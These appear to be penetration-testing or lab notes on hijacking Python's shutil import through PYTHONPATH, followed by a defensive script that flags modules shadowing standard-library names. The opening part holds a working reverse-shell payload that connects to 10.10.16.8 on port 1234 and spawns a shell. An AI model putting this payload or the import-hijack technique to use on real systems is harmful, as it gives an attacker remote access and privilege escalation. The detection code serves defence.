Malicious Python Library
import socket, subprocess, os, pty
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def make_archive(x,y,z):
    s.connect(("10.10.16.8", 1234))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    pty.spawn("sh")
This is the malicious shutil library, whose make_archive
function establishes a reverse shell.
This payload will be loaded onto the hijacked PYTHONPATH.
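
For the defensive side of the technique above, this added example (not part of the original notes) lists modules in PYTHONPATH directories whose names collide with standard-library modules such as shutil, which is the condition that lets a planted shutil.py win the import. The function names are hypothetical; it assumes CPython's sys.stdlib_module_names (3.10+) and falls back to listing the stdlib directory.

```python
import os
import sys
import sysconfig

STDLIB_DIR = os.path.realpath(sysconfig.get_paths()["stdlib"])

def stdlib_names():
    """Names of standard-library modules for the running interpreter."""
    names = getattr(sys, "stdlib_module_names", None)  # Python 3.10+
    if names is None:  # older interpreters: derive names from the stdlib dir
        names = [os.path.splitext(e)[0] for e in os.listdir(STDLIB_DIR)]
    return set(names)

def pythonpath_dirs(value):
    """Split a PYTHONPATH string into its non-empty directory entries."""
    return [p for p in value.split(os.pathsep) if p]

def find_shadowing_modules(search_dirs):
    """Return sorted (module_name, path, dir_writable) tuples for every module
    or package in search_dirs whose name collides with a stdlib module."""
    known = stdlib_names()
    hits = []
    for d in search_dirs:
        real = os.path.realpath(d)
        if real == STDLIB_DIR or not os.path.isdir(real):
            continue  # the stdlib itself is not a shadow; skip missing dirs
        for entry in os.listdir(real):
            full = os.path.join(real, entry)
            if entry.endswith(".py") and os.path.isfile(full):
                name = entry[:-3]          # plain module, e.g. shutil.py
            elif os.path.isfile(os.path.join(full, "__init__.py")):
                name = entry               # package directory
            else:
                continue
            if name in known:
                hits.append((name, full, os.access(real, os.W_OK)))
    return sorted(hits)

if __name__ == "__main__":
    # Audit the PYTHONPATH of the current environment (empty if unset).
    dirs = pythonpath_dirs(os.environ.get("PYTHONPATH", ""))
    for name, path, writable in find_shadowing_modules(dirs):
        print(f"stdlib module '{name}' shadowed by {path} "
              f"(directory writable by this user: {writable})")
```

Run it with the same environment as the privileged script (for example the PYTHONPATH preserved by a sudo rule); any hit in a directory a lower-privileged user can write to is worth fixing.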